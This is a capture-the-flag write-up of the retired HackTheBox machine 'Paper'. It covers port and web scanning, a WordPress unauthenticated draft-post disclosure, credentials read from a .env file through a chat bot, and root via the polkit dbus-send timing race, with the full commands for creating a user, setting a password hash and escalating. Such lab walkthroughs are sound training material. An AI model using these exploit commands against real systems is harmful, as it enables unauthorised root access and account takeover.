Paper WalkThrouge — HackTheBox

Adham A. Makroum
5 min readAug 6, 2022

--

Hey, my friends, I’m Adham Makroum aka 0xmkr24, Today I’ll root Paper Box which is retired today, try to simplify it for you and I wish this write-up be useful for you

Nmap

Nmap scan report for office.paper (10.10.11.143)
Host is up (0.0078s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open https?
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Actiontec MI424WR-GEN3I WAP (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (97%), Linux 4.4 (96%), Microsoft Windows XP SP3 (96%), VMware Player virtual NAT device (91%), BlueArc Titan 2100 NAS device (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 0.16 ms 192.168.192.2
2 0.20 ms office.paper (10.10.11.143)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 624.16 seconds

gobuster output was nothing useful so I go to nikto

Nikto

# nikto -host "<http://10.10.11.143/>"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.143
+ Target Hostname: 10.10.11.143
+ Target Port: 80
+ Start Time: 2022-02-15 07:05:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 2 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-02-15 07:10:04 (GMT-5) (293 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • As we can see x-backend-server is the uncommon header and it points to office.paper

so I added it to the hosts file then opened it in a browser

I noticed there is WordPress with version 5.2.3 so I ran Wpscan

Wpscan

# wpscan --url "<http://office.paper/>" -e vp,dbe,vt

but I didn’t find any vuln plugins or themes

After exploring this page I found this interesting comment

so I google it and found useful result

This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.

Proof of Concept

http://wordpress.local/?static=1

This blog to more understand about this vulnerability → Blog

then I added chat.office.paper to the hosts file

After reading messages in the general channel, I found a bot that can list files from the server but the channel was read-only so I chat with it in private

i tried to get user.txt

After searching in other files i found this

then I got .env

i tried this password to get ssh and it worked

then i got user.txt

Privilege Escalation

This is a time to take full access to this box

i transferred linpease and ran it

after reading the output I noticed this service

then I google it

Polkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones
it‘s installed by default on many Linux distributions. It’s used by systemd , so any Linux distribution that uses systemd also uses polkit.

I searched how can I get root privileges with it and found this blog

if you don’t need to follow how this vulnerability is exploited step by step then this is poc you can run it and you will be a user with root privileges

As mentioned in the blog we can run this command to measure how long it takes to run the dbus-send

time dbus-send — system — dest=org.freedesktop.Accounts — type=method_call — print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:”Boris Ivanovich Grishenko” int32:1Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required  real    0m0.060s 
user 0m0.004s
sys 0m0.002s

make sleep command with half real-time, for me is will be 0.030s

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.030s ; kill $!

you need to re enter this command many times until boris user created

Next, you need to set a password for the new account

The D-Bus interface expects a hashed password, which you can create using openssl

$ openssl passwd -5 password $5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3

Now you just have to do the same trick again, except this time call the SetPassword D-Bus method:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3' string:GoldenEye & sleep 0.030s ; kill $!

note that you need to paste in the correct user identifier (UID), which is 1005 in my case and edit sleep time as we did before + the password hash from the openssl command.

then

su - boris  
# password: password
sudo su
# password: password

Finally, the Machine is rooted!

Thanks for reading, I hope my write-up was useful for you. Feel free to connect with me on Twitter or Linkedin.

--

--